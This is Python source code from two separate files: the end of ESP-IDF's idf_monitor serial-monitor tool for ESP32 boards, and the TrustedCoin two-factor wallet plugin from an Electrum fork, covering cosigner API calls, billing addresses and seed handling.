self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But after some time when we didn't received it we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors="ignore"))):
self._force_line_print = True
if self._output_enabled:
self.console.write_bytes(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line.decode(errors="ignore")):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
elif c == CTRL_Y: # Toggle output display
self.output_toggle()
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
# to fast trigger pause without press menu key
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {makecmd:7} Build & flash project
--- {appmake:7} Build & flash app only
--- {output:7} Toggle output display
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
pause=key_description(CTRL_P))
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [CTRL_F, CTRL_A]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
yellow_print(translation.decode())
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum_xzc import ecc, constants, keystore, version, bip32, bitcoin
from electrum_xzc.bitcoin import TYPE_ADDRESS
from electrum_xzc.bip32 import BIP32Node, xpub_type
from electrum_xzc.crypto import sha256
from electrum_xzc.transaction import TxOutput
from electrum_xzc.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum_xzc.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_xzc.i18n import _
from electrum_xzc.plugin import BasePlugin, hook
from electrum_xzc.util import NotEnoughFunds, UserFacingException
from electrum_xzc.storage import STO_EV_USER_PW
from electrum_xzc.network import Network
from electrum_xzc.base_wizard import BaseWizard
from electrum_xzc.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address_segwit']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize()
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(str(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
